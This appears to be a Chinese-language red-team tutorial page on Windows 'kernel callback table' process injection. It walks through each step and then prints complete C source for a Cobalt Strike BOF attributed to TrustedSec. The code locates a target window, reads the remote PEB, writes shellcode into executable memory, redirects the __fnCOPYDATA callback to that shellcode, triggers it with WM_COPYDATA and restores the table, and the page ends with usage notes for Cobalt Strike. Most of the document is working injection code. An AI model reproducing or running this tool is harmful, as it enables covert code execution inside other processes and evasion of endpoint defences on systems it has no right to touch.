内核回调表注入

简介

在Windows操作系统中，user32.dll维护了一个内核回调表，该表包含了一系列的函数指针，这些函数在特定的系统事件发生时被调用。

利用内核回调表进行进程注入的核心思路是修改目标进程的内核回调表，将其中的某个回调函数的地址修改为我们的shellcode，然后触发相应的系统事件，从而在目标进程中执行shellcode

实现流程

1.定义结构体

首先定义了一个结构体KERNELCALLBACKTABLE，这个结构体表示 user32.dll 中的内核回调表，其中每个回调函数都有一个对应的指针

// user32.dll!apfnDispatch
typedef struct _KERNELCALLBACKTABLE_T {
    ULONG_PTR __fnCOPYDATA;
    ULONG_PTR __fnCOPYGLOBALDATA;
    ULONG_PTR __fnDWORD;
    ULONG_PTR __fnNCDESTROY;
    ULONG_PTR __fnDWORDOPTINLPMSG;
    ULONG_PTR __fnINOUTDRAG;
    ULONG_PTR __fnGETTEXTLENGTHS;
    ULONG_PTR __fnINCNTOUTSTRING;
    ULONG_PTR __fnPOUTLPINT;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT;
    ULONG_PTR __fnINLPCREATESTRUCT;
    ULONG_PTR __fnINLPDELETEITEMSTRUCT;
    ULONG_PTR __fnINLPDRAWITEMSTRUCT;
    ULONG_PTR __fnPOPTINLPUINT;
    ULONG_PTR __fnPOPTINLPUINT2;
    ULONG_PTR __fnINLPMDICREATESTRUCT;
    ULONG_PTR __fnINOUTLPMEASUREITEMSTRUCT;
    ULONG_PTR __fnINLPWINDOWPOS;
    ULONG_PTR __fnINOUTLPPOINT5;
    ULONG_PTR __fnINOUTLPSCROLLINFO;
    ULONG_PTR __fnINOUTLPRECT;
    ULONG_PTR __fnINOUTNCCALCSIZE;
    ULONG_PTR __fnINOUTLPPOINT5_;
    ULONG_PTR __fnINPAINTCLIPBRD;
    ULONG_PTR __fnINSIZECLIPBRD;
    ULONG_PTR __fnINDESTROYCLIPBRD;
    ULONG_PTR __fnINSTRING;
    ULONG_PTR __fnINSTRINGNULL;
    ULONG_PTR __fnINDEVICECHANGE;
    ULONG_PTR __fnPOWERBROADCAST;
    ULONG_PTR __fnINLPUAHDRAWMENU;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD_;
    ULONG_PTR __fnOUTDWORDINDWORD;
    ULONG_PTR __fnOUTLPRECT;
    ULONG_PTR __fnOUTSTRING;
    ULONG_PTR __fnPOPTINLPUINT3;
    ULONG_PTR __fnPOUTLPINT2;
    ULONG_PTR __fnSENTDDEMSG;
    ULONG_PTR __fnINOUTSTYLECHANGE;
    ULONG_PTR __fnHkINDWORD;
    ULONG_PTR __fnHkINLPCBTACTIVATESTRUCT;
    ULONG_PTR __fnHkINLPCBTCREATESTRUCT;
    ULONG_PTR __fnHkINLPDEBUGHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX;
    ULONG_PTR __fnHkINLPKBDLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSG;
    ULONG_PTR __fnHkINLPRECT;
    ULONG_PTR __fnHkOPTINLPEVENTMSG;
    ULONG_PTR __xxxClientCallDelegateThread;
    ULONG_PTR __ClientCallDummyCallback;
    ULONG_PTR __fnKEYBOARDCORRECTIONCALLOUT;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT2;
    ULONG_PTR __xxxClientCallDevCallbackCapture;
    ULONG_PTR __xxxClientCallDitThread;
    ULONG_PTR __xxxClientEnableMMCSS;
    ULONG_PTR __xxxClientUpdateDpi;
    ULONG_PTR __xxxClientExpandStringW;
    ULONG_PTR __ClientCopyDDEIn1;
    ULONG_PTR __ClientCopyDDEIn2;
    ULONG_PTR __ClientCopyDDEOut1;
    ULONG_PTR __ClientCopyDDEOut2;
    ULONG_PTR __ClientCopyImage;
    ULONG_PTR __ClientEventCallback;
    ULONG_PTR __ClientFindMnemChar;
    ULONG_PTR __ClientFreeDDEHandle;
    ULONG_PTR __ClientFreeLibrary;
    ULONG_PTR __ClientGetCharsetInfo;
    ULONG_PTR __ClientGetDDEFlags;
    ULONG_PTR __ClientGetDDEHookData;
    ULONG_PTR __ClientGetListboxString;
    ULONG_PTR __ClientGetMessageMPH;
    ULONG_PTR __ClientLoadImage;
    ULONG_PTR __ClientLoadLibrary;
    ULONG_PTR __ClientLoadMenu;
    ULONG_PTR __ClientLoadLocalT1Fonts;
    ULONG_PTR __ClientPSMTextOut;
    ULONG_PTR __ClientLpkDrawTextEx;
    ULONG_PTR __ClientExtTextOutW;
    ULONG_PTR __ClientGetTextExtentPointW;
    ULONG_PTR __ClientCharToWchar;
    ULONG_PTR __ClientAddFontResourceW;
    ULONG_PTR __ClientThreadSetup;
    ULONG_PTR __ClientDeliverUserApc;
    ULONG_PTR __ClientNoMemoryPopup;
    ULONG_PTR __ClientMonitorEnumProc;
    ULONG_PTR __ClientCallWinEventProc;
    ULONG_PTR __ClientWaitMessageExMPH;
    ULONG_PTR __ClientWOWGetProcModule;
    ULONG_PTR __ClientWOWTask16SchedNotify;
    ULONG_PTR __ClientImmLoadLayout;
    ULONG_PTR __ClientImmProcessKey;
    ULONG_PTR __fnIMECONTROL;
    ULONG_PTR __fnINWPARAMDBCSCHAR;
    ULONG_PTR __fnGETTEXTLENGTHS2;
    ULONG_PTR __fnINLPKDRAWSWITCHWND;
    ULONG_PTR __ClientLoadStringW;
    ULONG_PTR __ClientLoadOLE;
    ULONG_PTR __ClientRegisterDragDrop;
    ULONG_PTR __ClientRevokeDragDrop;
    ULONG_PTR __fnINOUTMENUGETOBJECT;
    ULONG_PTR __ClientPrinterThunk;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO2;
    ULONG_PTR __fnOUTLPSCROLLBARINFO;
    ULONG_PTR __fnINLPUAHDRAWMENU2;
    ULONG_PTR __fnINLPUAHDRAWMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU3;
    ULONG_PTR __fnINOUTLPUAHMEASUREMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU4;
    ULONG_PTR __fnOUTLPTITLEBARINFOEX;
    ULONG_PTR __fnTOUCH;
    ULONG_PTR __fnGESTURE;
    ULONG_PTR __fnPOPTINLPUINT4;
    ULONG_PTR __fnPOPTINLPUINT5;
    ULONG_PTR __xxxClientCallDefaultInputHandler;
    ULONG_PTR __fnEMPTY;
    ULONG_PTR __ClientRimDevCallback;
    ULONG_PTR __xxxClientCallMinTouchHitTestingCallback;
    ULONG_PTR __ClientCallLocalMouseHooks;
    ULONG_PTR __xxxClientBroadcastThemeChange;
    ULONG_PTR __xxxClientCallDevCallbackSimple;
    ULONG_PTR __xxxClientAllocWindowClassExtraBytes;
    ULONG_PTR __xxxClientFreeWindowClassExtraBytes;
    ULONG_PTR __fnGETWINDOWDATA;
    ULONG_PTR __fnINOUTSTYLECHANGE2;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX2;
} KERNELCALLBACKTABLE;

2.获取目标进程的窗口句柄

通过遍历所有窗口并检查其进程ID，找到与目标进程ID匹配的窗口句柄

// Get the handle to the target process's window
do
{
    hWnd = USER32$FindWindowExA(NULL, hWnd, NULL, NULL);
    if ( NULL == hWnd ) { break; }
    USER32$GetWindowThreadProcessId(hWnd, &dwProcessId);
}
while (dwProcessId != lpProcessInfo->dwProcessId);
if (NULL == hWnd)
{
    dwErrorCode = ERROR_INVALID_WINDOW_HANDLE;
    internal_printf("Failed to find a window handle for PID:%lu\n", lpProcessInfo->dwProcessId);
    goto end;
}

3.获取内核回调表地址

使用 NtQueryInformationProcess 和 NtReadVirtualMemory 从目标进程中读取其PEB（进程环境块），然后再从PEB中获取内核回调表的地址

// Get the ProcessBasicInformation of the remote process
intZeroMemory(&processBasicInformation, sizeof(processBasicInformation));
dwErrorCode = NtQueryInformationProcess(
    lpProcessInfo->hProcess, 
    ProcessBasicInformation, 
    &processBasicInformation, 
    sizeof(processBasicInformation), 
    NULL
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtQueryInformationProcess failed (%lu)\n", dwErrorCode);
    goto end;
}

// Read in the PEB from the remote process
intZeroMemory(&peb, sizeof(peb));
dwErrorCode = NtReadVirtualMemory(
    lpProcessInfo->hProcess, 
    processBasicInformation.PebBaseAddress, 
    &peb, 
    sizeof(peb), 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtReadVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

// Read in the kernel callback table from the remote process
intZeroMemory(&kernelCallbackTable, sizeof(kernelCallbackTable));
dwErrorCode = NtReadVirtualMemory(
    lpProcessInfo->hProcess, 
    peb.KernelCallbackTable, 
    &kernelCallbackTable, 
    sizeof(kernelCallbackTable), 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtReadVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

4.修改内核回调表

将内核回调表中的__fnCOPYDATA的地址修改为注入shellcode的地址，然后为注入的shellcode和新的内核回调表在目标进程中分配内存

// Allocate remote shellcode buffer
RegionSize = dwShellcodeBufferSize + 1;
dwErrorCode = NtAllocateVirtualMemory(
    lpProcessInfo->hProcess, 
    &lpRemoteShellcodeBuffer, 
    0, 
    &RegionSize, 
    MEM_COMMIT | MEM_RESERVE, 
    PAGE_EXECUTE_READWRITE
);
if (STATUS_SUCCESS != dwErrorCode)
{
    internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

// Write the shellcode to the remote buffer
dwErrorCode = NtWriteVirtualMemory(
    lpProcessInfo->hProcess, 
    lpRemoteShellcodeBuffer, 
    lpShellcodeBuffer, 
    dwShellcodeBufferSize, 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

// Update the Kernel Callback Table to point to our shellcode
kernelCallbackTable.__fnCOPYDATA = (ULONG_PTR)lpRemoteShellcodeBuffer;

// Allocate the new Kernel Callback Table buffer
RegionSize = sizeof(kernelCallbackTable) + 1;
dwErrorCode = NtAllocateVirtualMemory(
    lpProcessInfo->hProcess, 
    &lpRemoteKernelCallbackTableBuffer, 
    0, 
    &RegionSize, 
    MEM_COMMIT | MEM_RESERVE, 
    PAGE_READWRITE
);
if (STATUS_SUCCESS != dwErrorCode)
{
    internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

// Write the new Kernel Callback Table to the remote buffer
dwErrorCode = NtWriteVirtualMemory(
    lpProcessInfo->hProcess, 
    lpRemoteKernelCallbackTableBuffer, 
    &kernelCallbackTable, 
    sizeof(kernelCallbackTable), 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

5.更新目标进程的PEB

将目标进程PEB中的内核回调表地址更新为新的内核回调表的地址

// Update the PEB in the remote process to use the new kernel callback table
dwErrorCode = NtWriteVirtualMemory(
    lpProcessInfo->hProcess, 
    (PBYTE)processBasicInformation.PebBaseAddress + offsetof(intPEB, KernelCallbackTable), 
    &lpRemoteKernelCallbackTableBuffer, 
    sizeof(ULONG_PTR), 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

6.触发注入的代码

通过发送 WM_COPYDATA 消息到目标进程的窗口，触发 __fnCOPYDATA 事件，从而执行注入的shellcode

// Trigger the COPYDATA kernel callback function
intZeroMemory(&copyDataStruct, sizeof(copyDataStruct));
copyDataStruct.dwData = 1;
copyDataStruct.cbData = 4;
copyDataStruct.lpData = &RegionSize;
USER32$SendMessageA(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&copyDataStruct);

7.恢复原始状态

执行完注入的代码后，将目标进程PEB中的内核回调表地址恢复为原始地址

// Restore the original kernel callback table
dwErrorCode = NtWriteVirtualMemory(
    lpProcessInfo->hProcess, 
    (PBYTE)processBasicInformation.PebBaseAddress + offsetof(intPEB, KernelCallbackTable), 
    &peb.KernelCallbackTable, 
    sizeof(ULONG_PTR), 
    &RegionSize
);
if ( STATUS_SUCCESS != dwErrorCode )
{
    internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
    goto end;
}

BOF代码实现

以下代码源自TrustSec的Bof仓库：https://github.com/trustedsec/CS-Remote-OPs-BOF/tree/main

// user32.dll!apfnDispatch
typedef struct _KERNELCALLBACKTABLE_T {
    ULONG_PTR __fnCOPYDATA;
    ULONG_PTR __fnCOPYGLOBALDATA;
    ULONG_PTR __fnDWORD;
    ULONG_PTR __fnNCDESTROY;
    ULONG_PTR __fnDWORDOPTINLPMSG;
    ULONG_PTR __fnINOUTDRAG;
    ULONG_PTR __fnGETTEXTLENGTHS;
    ULONG_PTR __fnINCNTOUTSTRING;
    ULONG_PTR __fnPOUTLPINT;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT;
    ULONG_PTR __fnINLPCREATESTRUCT;
    ULONG_PTR __fnINLPDELETEITEMSTRUCT;
    ULONG_PTR __fnINLPDRAWITEMSTRUCT;
    ULONG_PTR __fnPOPTINLPUINT;
    ULONG_PTR __fnPOPTINLPUINT2;
    ULONG_PTR __fnINLPMDICREATESTRUCT;
    ULONG_PTR __fnINOUTLPMEASUREITEMSTRUCT;
    ULONG_PTR __fnINLPWINDOWPOS;
    ULONG_PTR __fnINOUTLPPOINT5;
    ULONG_PTR __fnINOUTLPSCROLLINFO;
    ULONG_PTR __fnINOUTLPRECT;
    ULONG_PTR __fnINOUTNCCALCSIZE;
    ULONG_PTR __fnINOUTLPPOINT5_;
    ULONG_PTR __fnINPAINTCLIPBRD;
    ULONG_PTR __fnINSIZECLIPBRD;
    ULONG_PTR __fnINDESTROYCLIPBRD;
    ULONG_PTR __fnINSTRING;
    ULONG_PTR __fnINSTRINGNULL;
    ULONG_PTR __fnINDEVICECHANGE;
    ULONG_PTR __fnPOWERBROADCAST;
    ULONG_PTR __fnINLPUAHDRAWMENU;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD;
    ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD_;
    ULONG_PTR __fnOUTDWORDINDWORD;
    ULONG_PTR __fnOUTLPRECT;
    ULONG_PTR __fnOUTSTRING;
    ULONG_PTR __fnPOPTINLPUINT3;
    ULONG_PTR __fnPOUTLPINT2;
    ULONG_PTR __fnSENTDDEMSG;
    ULONG_PTR __fnINOUTSTYLECHANGE;
    ULONG_PTR __fnHkINDWORD;
    ULONG_PTR __fnHkINLPCBTACTIVATESTRUCT;
    ULONG_PTR __fnHkINLPCBTCREATESTRUCT;
    ULONG_PTR __fnHkINLPDEBUGHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX;
    ULONG_PTR __fnHkINLPKBDLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSLLHOOKSTRUCT;
    ULONG_PTR __fnHkINLPMSG;
    ULONG_PTR __fnHkINLPRECT;
    ULONG_PTR __fnHkOPTINLPEVENTMSG;
    ULONG_PTR __xxxClientCallDelegateThread;
    ULONG_PTR __ClientCallDummyCallback;
    ULONG_PTR __fnKEYBOARDCORRECTIONCALLOUT;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO;
    ULONG_PTR __fnINLPCOMPAREITEMSTRUCT2;
    ULONG_PTR __xxxClientCallDevCallbackCapture;
    ULONG_PTR __xxxClientCallDitThread;
    ULONG_PTR __xxxClientEnableMMCSS;
    ULONG_PTR __xxxClientUpdateDpi;
    ULONG_PTR __xxxClientExpandStringW;
    ULONG_PTR __ClientCopyDDEIn1;
    ULONG_PTR __ClientCopyDDEIn2;
    ULONG_PTR __ClientCopyDDEOut1;
    ULONG_PTR __ClientCopyDDEOut2;
    ULONG_PTR __ClientCopyImage;
    ULONG_PTR __ClientEventCallback;
    ULONG_PTR __ClientFindMnemChar;
    ULONG_PTR __ClientFreeDDEHandle;
    ULONG_PTR __ClientFreeLibrary;
    ULONG_PTR __ClientGetCharsetInfo;
    ULONG_PTR __ClientGetDDEFlags;
    ULONG_PTR __ClientGetDDEHookData;
    ULONG_PTR __ClientGetListboxString;
    ULONG_PTR __ClientGetMessageMPH;
    ULONG_PTR __ClientLoadImage;
    ULONG_PTR __ClientLoadLibrary;
    ULONG_PTR __ClientLoadMenu;
    ULONG_PTR __ClientLoadLocalT1Fonts;
    ULONG_PTR __ClientPSMTextOut;
    ULONG_PTR __ClientLpkDrawTextEx;
    ULONG_PTR __ClientExtTextOutW;
    ULONG_PTR __ClientGetTextExtentPointW;
    ULONG_PTR __ClientCharToWchar;
    ULONG_PTR __ClientAddFontResourceW;
    ULONG_PTR __ClientThreadSetup;
    ULONG_PTR __ClientDeliverUserApc;
    ULONG_PTR __ClientNoMemoryPopup;
    ULONG_PTR __ClientMonitorEnumProc;
    ULONG_PTR __ClientCallWinEventProc;
    ULONG_PTR __ClientWaitMessageExMPH;
    ULONG_PTR __ClientWOWGetProcModule;
    ULONG_PTR __ClientWOWTask16SchedNotify;
    ULONG_PTR __ClientImmLoadLayout;
    ULONG_PTR __ClientImmProcessKey;
    ULONG_PTR __fnIMECONTROL;
    ULONG_PTR __fnINWPARAMDBCSCHAR;
    ULONG_PTR __fnGETTEXTLENGTHS2;
    ULONG_PTR __fnINLPKDRAWSWITCHWND;
    ULONG_PTR __ClientLoadStringW;
    ULONG_PTR __ClientLoadOLE;
    ULONG_PTR __ClientRegisterDragDrop;
    ULONG_PTR __ClientRevokeDragDrop;
    ULONG_PTR __fnINOUTMENUGETOBJECT;
    ULONG_PTR __ClientPrinterThunk;
    ULONG_PTR __fnOUTLPCOMBOBOXINFO2;
    ULONG_PTR __fnOUTLPSCROLLBARINFO;
    ULONG_PTR __fnINLPUAHDRAWMENU2;
    ULONG_PTR __fnINLPUAHDRAWMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU3;
    ULONG_PTR __fnINOUTLPUAHMEASUREMENUITEM;
    ULONG_PTR __fnINLPUAHDRAWMENU4;
    ULONG_PTR __fnOUTLPTITLEBARINFOEX;
    ULONG_PTR __fnTOUCH;
    ULONG_PTR __fnGESTURE;
    ULONG_PTR __fnPOPTINLPUINT4;
    ULONG_PTR __fnPOPTINLPUINT5;
    ULONG_PTR __xxxClientCallDefaultInputHandler;
    ULONG_PTR __fnEMPTY;
    ULONG_PTR __ClientRimDevCallback;
    ULONG_PTR __xxxClientCallMinTouchHitTestingCallback;
    ULONG_PTR __ClientCallLocalMouseHooks;
    ULONG_PTR __xxxClientBroadcastThemeChange;
    ULONG_PTR __xxxClientCallDevCallbackSimple;
    ULONG_PTR __xxxClientAllocWindowClassExtraBytes;
    ULONG_PTR __xxxClientFreeWindowClassExtraBytes;
    ULONG_PTR __fnGETWINDOWDATA;
    ULONG_PTR __fnINOUTSTYLECHANGE2;
    ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX2;
} KERNELCALLBACKTABLE;

DWORD kernelcallbacktable(PROCESS_INFORMATION* lpProcessInfo, LPBYTE lpShellcodeBuffer, DWORD dwShellcodeBufferSize)
{
    DWORD  dwErrorCode = ERROR_SUCCESS;
    HWND hWnd = NULL;
    DWORD dwProcessId = 0;
    PHMOD hNTDLL = NULL;
    NtQueryInformationProcess_t NtQueryInformationProcess = NULL;
    NtAllocateVirtualMemory_t NtAllocateVirtualMemory = NULL;
    NtReadVirtualMemory_t NtReadVirtualMemory = NULL;
    NtWriteVirtualMemory_t NtWriteVirtualMemory = NULL;
    NtFreeVirtualMemory_t     NtFreeVirtualMemory = NULL;
    PROCESS_BASIC_INFORMATION processBasicInformation;
    intPEB peb;
    KERNELCALLBACKTABLE kernelCallbackTable;
    SIZE_T RegionSize = 0;
    LPVOID lpRemoteShellcodeBuffer = NULL;
    LPVOID lpRemoteKernelCallbackTableBuffer = NULL;
    COPYDATASTRUCT copyDataStruct;
 
 /*
    internal_printf("hThread:               %p\n", lpProcessInfo->hThread);
    internal_printf("hProcess:              %p\n", lpProcessInfo->hProcess);
    internal_printf("dwProcessId:           %u\n", lpProcessInfo->dwProcessId);
    internal_printf("dwThreadId:            %u\n", lpProcessInfo->dwThreadId);
    internal_printf("lpShellcodeBuffer:     %p\n", lpShellcodeBuffer);
    internal_printf("dwShellcodeBufferSize: %lu\n", dwShellcodeBufferSize);
*/

    // Custom LoadLibrary on NTDLL
    hNTDLL = _LoadLibrary(NTDLL_PATH);
    if(NULL == hNTDLL) { goto end; }

    // Get the syscall addresses
    NtQueryInformationProcess = (NtQueryInformationProcess_t)GetSyscallStub(hNTDLL, "NtQueryInformationProcess");
    NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetSyscallStub(hNTDLL, "NtAllocateVirtualMemory");
    NtReadVirtualMemory = (NtReadVirtualMemory_t)GetSyscallStub(hNTDLL, "NtReadVirtualMemory");
    NtWriteVirtualMemory = (NtWriteVirtualMemory_t)GetSyscallStub(hNTDLL, "NtWriteVirtualMemory");
    NtFreeVirtualMemory = (NtFreeVirtualMemory_t)GetSyscallStub(hNTDLL, "NtFreeVirtualMemory");
    if ((NULL == NtQueryInformationProcess) || 
        (NULL == NtAllocateVirtualMemory) || 
        (NULL == NtReadVirtualMemory) || 
        (NULL == NtWriteVirtualMemory) || 
        (NULL == NtFreeVirtualMemory)
    )
    {
        dwErrorCode = ERROR_PROC_NOT_FOUND;
        internal_printf("GetSyscallStub failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Get the handle to the target process's window
    do
    {
        hWnd = USER32$FindWindowExA(NULL, hWnd, NULL, NULL);
        if ( NULL == hWnd ) { break; }
        USER32$GetWindowThreadProcessId(hWnd, &dwProcessId);
    }
    while (dwProcessId != lpProcessInfo->dwProcessId);
    if (NULL == hWnd)
    {
        dwErrorCode = ERROR_INVALID_WINDOW_HANDLE;
        internal_printf("Failed to find a window handle for PID:%lu\n", lpProcessInfo->dwProcessId);
        goto end;
    }

    // Get the ProcessBasicInformation of the remote process
    intZeroMemory(&processBasicInformation, sizeof(processBasicInformation));
    dwErrorCode = NtQueryInformationProcess(
        lpProcessInfo->hProcess, 
        ProcessBasicInformation, 
        &processBasicInformation, 
        sizeof(processBasicInformation), 
        NULL
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtQueryInformationProcess failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Read in the PEB from the remote process
    intZeroMemory(&peb, sizeof(peb));
    dwErrorCode = NtReadVirtualMemory(
        lpProcessInfo->hProcess, 
        processBasicInformation.PebBaseAddress, 
        &peb, 
        sizeof(peb), 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtReadVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Read in the kernel callback table from the remote process
    intZeroMemory(&kernelCallbackTable, sizeof(kernelCallbackTable));
    dwErrorCode = NtReadVirtualMemory(
        lpProcessInfo->hProcess, 
        peb.KernelCallbackTable, 
        &kernelCallbackTable, 
        sizeof(kernelCallbackTable), 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtReadVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Allocate remote shellcode buffer
    RegionSize = dwShellcodeBufferSize + 1;
    dwErrorCode = NtAllocateVirtualMemory(
        lpProcessInfo->hProcess, 
        &lpRemoteShellcodeBuffer, 
        0, 
        &RegionSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_EXECUTE_READWRITE
    );
    if (STATUS_SUCCESS != dwErrorCode)
    {
        internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Write the shellcode to the remote buffer
    dwErrorCode = NtWriteVirtualMemory(
        lpProcessInfo->hProcess, 
        lpRemoteShellcodeBuffer, 
        lpShellcodeBuffer, 
        dwShellcodeBufferSize, 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Update the Kernel Callback Table to point to our shellcode
    kernelCallbackTable.__fnCOPYDATA = (ULONG_PTR)lpRemoteShellcodeBuffer;

    // Allocate the new Kernel Callback Table buffer
    RegionSize = sizeof(kernelCallbackTable) + 1;
    dwErrorCode = NtAllocateVirtualMemory(
        lpProcessInfo->hProcess, 
        &lpRemoteKernelCallbackTableBuffer, 
        0, 
        &RegionSize, 
        MEM_COMMIT | MEM_RESERVE, 
        PAGE_READWRITE
    );
    if (STATUS_SUCCESS != dwErrorCode)
    {
        internal_printf("NtAllocateVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Write the new Kernel Callback Table to the remote buffer
    dwErrorCode = NtWriteVirtualMemory(
        lpProcessInfo->hProcess, 
        lpRemoteKernelCallbackTableBuffer, 
        &kernelCallbackTable, 
        sizeof(kernelCallbackTable), 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Update the PEB in the remote process to use the new kernel callback table
    dwErrorCode = NtWriteVirtualMemory(
        lpProcessInfo->hProcess, 
        (PBYTE)processBasicInformation.PebBaseAddress + offsetof(intPEB, KernelCallbackTable), 
        &lpRemoteKernelCallbackTableBuffer, 
        sizeof(ULONG_PTR), 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

    // Trigger the COPYDATA kernel callback function
    intZeroMemory(&copyDataStruct, sizeof(copyDataStruct));
    copyDataStruct.dwData = 1;
    copyDataStruct.cbData = 4;
    copyDataStruct.lpData = &RegionSize;
    USER32$SendMessageA(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&copyDataStruct);

    KERNEL32$Sleep(10);

    // Restore the original kernel callback table
    dwErrorCode = NtWriteVirtualMemory(
        lpProcessInfo->hProcess, 
        (PBYTE)processBasicInformation.PebBaseAddress + offsetof(intPEB, KernelCallbackTable), 
        &peb.KernelCallbackTable, 
        sizeof(ULONG_PTR), 
        &RegionSize
    );
    if ( STATUS_SUCCESS != dwErrorCode )
    {
        internal_printf("NtWriteVirtualMemory failed (%lu)\n", dwErrorCode);
        goto end;
    }

end:
    // Free remote kernel callback table
    if (lpRemoteKernelCallbackTableBuffer)
    {
        NtFreeVirtualMemory(
            lpProcessInfo->hProcess, 
            lpRemoteKernelCallbackTableBuffer, 
            0, 
            MEM_RELEASE | MEM_DECOMMIT
        );
        lpRemoteKernelCallbackTableBuffer = NULL;
    }

    // Free remote shellcode?
    /*
    if (lpRemoteShellcodeBuffer)
    {
        NtFreeVirtualMemory(
            lpProcessInfo->hProcess, 
            lpRemoteShellcodeBuffer, 
            0, 
            MEM_RELEASE | MEM_DECOMMIT
        );
        lpRemoteShellcodeBuffer = NULL;
    }
    */

    return dwErrorCode;
}

运行演示

在CobaltStrike执行内核回调注入的bof项目，进程注入成功后，源进程会停止通讯，若想要恢复通讯，需将注入进程的beacon会话退出

上一页session0注入下一页剪切板注入

最后更新于1年前

hashtag简介

hashtag实现流程

hashtag1.定义结构体

hashtag2.获取目标进程的窗口句柄

hashtag3.获取内核回调表地址

hashtag4.修改内核回调表

hashtag5.更新目标进程的PEB

hashtag6.触发注入的代码

hashtag7.恢复原始状态

hashtagBOF代码实现

hashtag运行演示

简介